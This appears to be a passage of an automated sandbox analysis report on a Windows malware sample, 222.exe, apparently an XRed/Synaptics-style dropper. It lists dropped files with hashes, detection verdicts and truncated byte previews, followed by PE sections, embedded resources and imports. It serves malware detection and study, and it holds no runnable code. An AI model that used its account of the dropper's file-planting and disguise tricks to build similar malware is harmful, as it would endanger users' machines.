                                                                                                                                      SSDEEP:24:8qwfOL48pZLeVZtbNqLtE0QA0OjE2+s9T4IlQpL9m:8qwc97MJYLKkvr9MIlQ/
                                                                                                                                      MD5:672F4764AF02B3461FAA426D96AD51BB
                                                                                                                                      SHA1:C1EFEAD747164EF41A44F85A149953D5254001F5
                                                                                                                                      SHA-256:D10794ADDA780AD7A682955C5650E16F8B64E309D60D93CFFE8D37691F1BAF8D
                                                                                                                                      SHA-512:7F12FB55F134D87280E81B41814C3932291D18A1C65DC2E2D8E3EEAA0BB800E258FBE1CEB6B0AB55C0FDA5FC9E744CDD1DAB2C5B33658AB5083461D0D50AF3DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. .......Z...A..Z...A..Z............................:..DG..Yr?.D..U..k0.&...&...... M......u..Z..4"..Z......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.R....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.R..Roaming.@......DWSl.Y.R....C......................a..R.o.a.m.i.n.g.....V.1......Y.R..Windata.@......Y.R.Y.R....s.....................hn..W.i.n.d.a.t.a.....`.2......Y.R .EWZJGF.exe..F......Y.R.Y.R..........................$...E.W.Z.J.G.F...e.x.e.......a...............-.......`...........;d.......C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.E.W.Z.J.G.F...e.x.e.*.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):952320
                                                                                                                                      Entropy (8bit):7.853882881449956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:ZhloDX0XOf4LvPAXY3+3NRMaqIL90KNUFmX1tqqNZlz:ZhloJfCAh9RMUBrNUFqtBZl
                                                                                                                                      MD5:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      SHA1:A0B1EC84B0A2DB8F801981E247578217B71B38DA
                                                                                                                                      SHA-256:1FE023F69F42FCD4BE4BAA180BBFF00B7FFE51C553211DD0DF45FB7FF71148B8
                                                                                                                                      SHA-512:111C1915D81141398B6BB7A0AA0E98896FB05D5548ACE8FD1E0E23343EAE60EA1E3D6617D3F5F883B96C8E05F5F868A280683341810896C00FA6EF1F68338992
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....Hng.........."......P...@...`.......p........@........................... ...........@...@.......@.....................\...$.......\;..............................................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......@...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                      C:\Users\user\Desktop\._cache_222.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):952320
                                                                                                                                      Entropy (8bit):7.853882881449956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:ZhloDX0XOf4LvPAXY3+3NRMaqIL90KNUFmX1tqqNZlz:ZhloJfCAh9RMUBrNUFqtBZl
                                                                                                                                      MD5:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      SHA1:A0B1EC84B0A2DB8F801981E247578217B71B38DA
                                                                                                                                      SHA-256:1FE023F69F42FCD4BE4BAA180BBFF00B7FFE51C553211DD0DF45FB7FF71148B8
                                                                                                                                      SHA-512:111C1915D81141398B6BB7A0AA0E98896FB05D5548ACE8FD1E0E23343EAE60EA1E3D6617D3F5F883B96C8E05F5F868A280683341810896C00FA6EF1F68338992
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....Hng.........."......P...@...`.......p........@........................... ...........@...@.......@.....................\...$.......\;..............................................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......@...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                      C:\Users\user\Documents\EEGWXUHVUG\NVWZAPQSQL.xlsm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18387
                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                      C:\Users\user\Documents\EEGWXUHVUG\~$NVWZAPQSQL.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                      MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                      SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                      SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                      SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                      C:\Users\user\Documents\EEGWXUHVUG\~$cache1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):771584
                                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1835008
                                                                                                                                      Entropy (8bit):4.4217530311243225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:RSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNT0uhiTw:ovloTMW+EZMM6DFyp03w
                                                                                                                                      MD5:2BE175707625ABA5750740914B18349F
                                                                                                                                      SHA1:62109D36A2E081BF43CD760C2DE97066249B1B3E
                                                                                                                                      SHA-256:C9744729FBDB0D0EDA5B128FE95680E3BB827C9EF7435A4EAF84ADDF4EA081DE
                                                                                                                                      SHA-512:072461C45906BCDF5D08EE3214B10E47BE134E6F2FE95324607A8B7119C654596B784DBB3E1870A5D4EE8C132F4DD7645E428AA321C613A9E69ED5152A8CF333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..!.Z................................................................................................................................................................................................................................................................................................................................................6.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.463863136848696
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                      • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                      File name:222.exe
                                                                                                                                      File size:1'723'904 bytes
                                                                                                                                      MD5:71386f37f17778126296ca734975db6d
                                                                                                                                      SHA1:353818dcd74d06565fc0e8ac4416e594d29ecd0b
                                                                                                                                      SHA256:c1317da0fd0dc3d73b38634ea586016f6f651f52acc576fbae8b82721c83e9ae
                                                                                                                                      SHA512:e5e0d87f91611bccfea16222c9afb7ac7b949f1762244ced01f9d8a78e2c992cfe8c1faaf1391f4cf107604a0e9f7a64fa4adda1c339d8dc85b27e7be610b83c
                                                                                                                                      SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                      TLSH:BF85C0B2B3818436D433563C8C7B93A75427BA5D2D38690D3BE57F4E6E3A34228261D7
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:2eec8e8cb683b9b1

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x49ab80
                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                      mov eax, 0049A778h
                                                                                                                                      call 00007F576085A79Dh
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007F57608AE0E5h
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, 0049ABE0h
                                                                                                                                      call 00007F57608ADCE4h
                                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                                      call 00007F57608AE0D4h
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007F57608AE148h
                                                                                                                                      call 00007F576085827Bh
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000xfa530.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0xb00000xfa5300xfa60030d46fc5e50491835f364d71df06ae89False0.8753832142411383data7.769726099444571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                      RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                                      RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                                      RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                                      RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                                      RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                                      RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                      RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                      RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                      RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                      RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                      RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                      RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                      RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                      RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                      RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                      RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                      RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                      RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.36350844277673544
                                                                                                                                      RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                                      RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                                      RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                                      RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                                      RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                                      RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                                      RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                                      RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                                      RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                                      RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                                      RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                                      RT_STRING0xb67b80xdcdata0.6
                                                                                                                                      RT_STRING0xb68940x320data0.45125
                                                                                                                                      RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                                      RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                                      RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                                      RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                                      RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                                      RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                                      RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                                      RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                                      RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                                      RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                                      RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                                      RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                                      RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                                      RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                                      RT_RCDATA0xb8e040x10data1.5
                                                                                                                                      RT_RCDATA0xb8e140xe8800PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.90439453125
                                                                                                                                      RT_RCDATA0x1a16140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                                      RT_RCDATA0x1a16180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                                      RT_RCDATA0x1a52180x64cdata0.5998759305210918
                                                                                                                                      RT_RCDATA0x1a58640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                                      RT_RCDATA0x1a59b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                                      RT_GROUP_CURSOR0x1aa18c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                      RT_GROUP_CURSOR0x1aa1a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                      RT_GROUP_CURSOR0x1aa1b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                      RT_GROUP_CURSOR0x1aa1c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                      RT_GROUP_CURSOR0x1aa1dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                      RT_GROUP_CURSOR0x1aa1f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                      RT_GROUP_CURSOR0x1aa2040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                      RT_GROUP_ICON0x1aa2180x14dataTurkishTurkey1.1
                                                                                                                                      RT_VERSION0x1aa22c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                      advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                                      kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
